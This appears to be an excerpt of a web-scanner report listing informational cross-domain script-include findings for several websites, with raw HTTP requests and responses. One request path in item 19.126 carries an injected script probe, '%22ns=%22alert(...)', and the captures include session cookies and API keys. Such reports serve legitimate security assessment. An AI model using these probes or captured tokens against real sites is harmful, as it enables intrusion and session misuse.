Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2C; geo=US; s_sq=appleglobal%2Cappleusmac%3D%2526pid%253Dmac%252520-%252520index%252520(us)%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.apple.com%25252Fipod%25252F_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1%26appleusipad%3D%2526pid%253Dipad%252520-%252520ios%2525C2%2525A04%252520(us)%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.apple.com%25252Fmac%25252F_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=48%2C48%2C1012%2C; s_ria=Flash%2010%7C; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3B; s_cc=true; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=mac%20-%20index%20(us);

Response

HTTP/1.1 200 OK
Server: Apache/2.2.11 (Unix)
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=159
Expires: Thu, 03 Feb 2011 17:56:40 GMT
Date: Thu, 03 Feb 2011 17:54:01 GMT
Content-Length: 11975
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-US">
<head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <meta name="Author" content="Ap
...[SNIP]...
<link rel="stylesheet" href="http://images.apple.com/buy/locator/styles/locator.css" type="text/css" />
   <script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAA6PaosEaRK-xbZhsFiBKcdRQ79oUYwI3jKsrkc8z62jeWFLRnZhSQQt-4KpPcuporYLKo9_WX6PRetw" type="text/javascript"></script>
...[SNIP]...

19.121. http://www.apple.com/itunes/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apple.com
Path:   /itunes/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /itunes/ HTTP/1.1
Host: www.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; geo=US; s_ria=Flash%2010%7C; s_pathLength=homepage%3D1%2C; s_vnum_us=ch%3Dhomepage%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3B; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_orientation=%5B%5BB%5D%5D; s_ppv=100%2C100%2C1012%2C; s_orientationHeight=1012; dfa_cookie=appleglobal%2Capplehome; s_pv=apple%20-%20index%20(us); s_cc=true; s_sq=appleglobal%2Capplehome%3D%2526pid%253Dapple%252520-%252520index%252520(us)%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.apple.com%25252Fitunes%25252F_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Apache/2.2.14 (Unix)
ntCoent-length: 14005
Vary: Accept-Encoding
Cache-Control: max-age=217
Expires: Thu, 03 Feb 2011 17:53:31 GMT
Date: Thu, 03 Feb 2011 17:49:54 GMT
Connection: close
Content-Length: 14005

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <meta name="Author" content="Ap
...[SNIP]...
<div class="fbfan">
       <script src="http://static.ak.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US" type="text/javascript"></script>
...[SNIP]...

19.122. http://www.apple.com/itunes/charts/songs/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apple.com
Path:   /itunes/charts/songs/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /itunes/charts/songs/ HTTP/1.1
Host: www.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2C; geo=US; s_sq=appleglobal%2Cappleusmac%3D%2526pid%253Dmac%252520-%252520index%252520(us)%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.apple.com%25252Fipod%25252F_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1%26appleusipad%3D%2526pid%253Dipad%252520-%252520ios%2525C2%2525A04%252520(us)%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.apple.com%25252Fmac%25252F_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=48%2C48%2C1012%2C; s_ria=Flash%2010%7C; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3B; s_cc=true; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=mac%20-%20index%20(us);

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Apache/2.2.11 (Unix)
ntCoent-length: 84898
Cache-Control: max-age=439
Expires: Thu, 03 Feb 2011 18:01:10 GMT
Date: Thu, 03 Feb 2011 17:53:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 84898

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <meta name="Author" content="Ap
...[SNIP]...
<div class="fbfan">
       <script src="http://static.ak.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US" type="text/javascript"></script>
...[SNIP]...

19.123. http://www.atlastravelweb.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.atlastravelweb.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.atlastravelweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68752
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQSCCAAQS=KOLLNFNAIMDDAJHLAICANGDC; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 21:48:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...
</script>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0009/4668.js"> </script>
...[SNIP]...

19.124. http://www.bizfind.us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizfind.us
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.bizfind.us
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQQCTAQA=KHEEKNBBHJMPFGDEDDNMBPHF; __utmz=252525594.1296786866.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=252525594.371918977.1296786866.1296786866.1296786866.1; __utmc=252525594; __utmb=252525594.1.10.1296786866

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 02:33:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 15367
Content-Type: text/html
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Bizfind - PORTAL OF USA COMPANIES</title>
<meta name="descrip
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

19.125. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizfind.us
Path:   /15/182221/abc-development-inc/chicago.aspx/x22

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /15/182221/abc-development-inc/chicago.aspx/x22 HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 21:48:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11262
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQCTAQA=MBEEKNBBLDIKBKLLPOJKBBJH; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22</title>
<meta name="descrip
...[SNIP]...
</script>
   <script type="text/javascript"
   src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

   </script>
...[SNIP]...
<td valign=top align=center width=400 rowspan=3>
               
<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;sensor=false&amp;key=ABQIAAAAqUG6cBk-lc5l1KbeaOXOjhTubhXEVwpghVXLU4K27b8P7oUIhBSMYxh0xBzPJNNUP_E0Nghrmd9Stw" type="text/javascript"></script>
...[SNIP]...
</script>
                   <script type="text/javascript"
                   src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                   </script>
...[SNIP]...
</script>
       <script type="text/javascript"
       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

       </script>
...[SNIP]...

19.126. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizfind.us
Path:   /15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bizfind.us

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 02:35:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11710
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQCTAQA=GNNNLNBBCDCJFMEMFLPKHOHL; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22/"NS="ALERT(0X0006C1)</title>
...[SNIP]...
</script>
   <script type="text/javascript"
   src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

   </script>
...[SNIP]...
<td valign=top align=center width=400 rowspan=3>
               
<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;sensor=false&amp;key=ABQIAAAAqUG6cBk-lc5l1KbeaOXOjhTubhXEVwpghVXLU4K27b8P7oUIhBSMYxh0xBzPJNNUP_E0Nghrmd9Stw" type="text/javascript"></script>
...[SNIP]...
</script>
                   <script type="text/javascript"
                   src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                   </script>
...[SNIP]...
</script>
       <script type="text/javascript"
       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

       </script>
...[SNIP]...

19.127. http://www.boldchat.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.boldchat.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.boldchat.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/2.1.13
Cache-Control: private
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM", policyref="http://images.boldchat.com/w3c/p3p.xml"
Set-Cookie: JSESSIONID=aEIjMQSaeS8g; path=/
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 19:19:32 GMT
Content-Length: 37731


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
</div>
       <script src="http://www.google.com/uds/api?file=uds.js&v=1.0&key=ABQIAAAAjYVwyX7HLSZCVXMGa3iSZxT0em_hwbFBxmFd0amHeM1RDJ6VmxQgvsKBCnxviZesCaQSxQOp_7YtBw&hl=en" type="text/javascript"></script>
       <script src="http://www.google.com/cse/api/overlay.js" type="text/javascript"></script>
...[SNIP]...

19.128. http://www.butterscotch.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?src=tcv3video HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=9cd00a7bedd9d1a8c93d852d79adbcb6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 9cd00a7bedd9d1a8c93d852d79adbcb6=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siD7RLYJm73OfIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 63409

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://www8.tucows.com/delivery/ag.php'></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://www8.tucows.com/delivery/ag.php'></script>
...[SNIP]...

19.129. http://www.butterscotch.com/tutorials.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /tutorials.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tutorials.html HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4f3e97b05b6880b7e05533d94dab21a4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4f3e97b05b6880b7e05533d94dab21a4=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 56018

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://www8.tucows.com/delivery/ag.php'></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://www8.tucows.com/delivery/ag.php'></script>
...[SNIP]...

19.130. http://www.casinotop10.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.casinotop10.net
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.casinotop10.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:49 GMT
Server: Apache/2.2.15 (EL)
Last-Modified: Thu, 03 Feb 2011 03:02:03 GMT
Accept-Ranges: bytes
Content-Length: 83705
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Best Online Casinos
...[SNIP]...
</h3>
<script type="text/javascript" src="http://www.microgaming.com/modules/common/mandatory.php"></script>
...[SNIP]...
<!--MajorMillions--><script type="text/javascript" src="http://www.microgaming.com/modules/common/getProgBlock.php?progid=10&amp;id=739&amp;pw=739&amp;showlogo=yes"></script>
...[SNIP]...
<!--Tunzamunni--><script type="text/javascript" src="http://www.microgaming.com/modules/common/getProgBlock.php?progid=13&amp;id=739&amp;pw=739&amp;showlogo=yes"></script>
...[SNIP]...
<!--Mega Moolah--><script type="text/javascript" src="http://www.microgaming.com/modules/common/getProgBlock.php?progid=15&amp;id=739&amp;pw=739&amp;showlogo=yes"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pub=ct10us"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://cetrk.com/pages/scripts/0009/9454.js"> </script>
...[SNIP]...

19.131. http://www.city-data.com/zips/48083.html/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.city-data.com
Path:   /zips/48083.html/x22

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /zips/48083.html/x22 HTTP/1.1
Host: www.city-data.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:49 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 154951

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>48083 Zip Code (Troy, Michigan) Profile - homes, apartments, schools, po
...[SNIP]...
</style>
<script type="text/javascript" src="http://www.google.com/jsapi?key=ABQIAAAAW4xxdiJ_DmGWpVgHRyCMmRSRX7L3kFzbZax_udZcvCoMcbWvqhRKjSG5ql7ZPbPBVpGab3ynclCLDg"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

19.132. http://www.cloudscan.me/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudscan.me
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.cloudscan.me
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: whoson=329-1294353363818; __utmz=117772502.1294799250.4.4.utmcsr=127.0.0.1:3000|utmccn=(referral)|utmcmd=referral|utmcct=/demos/cwe-79-demo.html; __utma=117772502.1326451636.1294353367.1294799250.1294877056.5
If-None-Match: "41e04948-8b72-48ca-9609-eeaa2b0f81e5"
If-Modified-Since: Wed, 12 Jan 2011 00:25:49 GMT

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: blogger_TID=2c4e59d50b3eaf45; HttpOnly
Expires: Fri, 04 Feb 2011 16:09:03 GMT
Date: Fri, 04 Feb 2011 16:09:03 GMT
Cache-Control: private
Last-Modified: Fri, 04 Feb 2011 16:06:32 GMT
ETag: "65b39502-51d6-45a9-bae0-023d7d11e2d4"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 228680

<!DOCTYPE html>
<html b:version='2' class='v2' dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='ht
...[SNIP]...
<!-- Embedded WhosOn: Insert the script below at the point on your page where you want the Click To Chat link to appear -->
<script type='text/javascript' src='http://hostedusa3.whoson.com/include.js?domain=stalker.opticalcorp.com'></script>
...[SNIP]...
</div>
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://www.blogger.com/static/v1/widgets/2885921908-widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
<script type="text/javascript" src="http://www.google.com/uds/solutions/slideshow/gfslideshow.js"></script>
...[SNIP]...

19.133. http://www.cloudscan.me/2010/12/ad-cdn-http-header-injection-cwe-113.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudscan.me
Path:   /2010/12/ad-cdn-http-header-injection-cwe-113.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2010/12/ad-cdn-http-header-injection-cwe-113.html HTTP/1.1
Host: www.cloudscan.me
Proxy-Connection: keep-alive
Referer: http://www.cloudscan.me/2011/01/abstract-white-paper-relative.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: whoson=329-1294353363818; __utmz=117772502.1294799250.4.4.utmcsr=127.0.0.1:3000|utmccn=(referral)|utmcmd=referral|utmcct=/demos/cwe-79-demo.html; blogger_TID=2c4e59d50b3eaf45; __utma=117772502.1326451636.1294353367.1294877056.1296835822.6; __utmc=117772502; __utmb=117772502.7.10.1296835822

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Fri, 04 Feb 2011 16:11:35 GMT
Date: Fri, 04 Feb 2011 16:11:35 GMT
Cache-Control: public, max-age=0, proxy-revalidate, must-revalidate
Last-Modified: Fri, 04 Feb 2011 16:06:32 GMT
ETag: "65b39502-51d6-45a9-bae0-023d7d11e2d4"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 113787

<!DOCTYPE html>
<html b:version='2' class='v2' dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='ht
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.blogger.com/static/v1/jsbin/4011894546-comment_from_post_iframe.js"></script>
...[SNIP]...
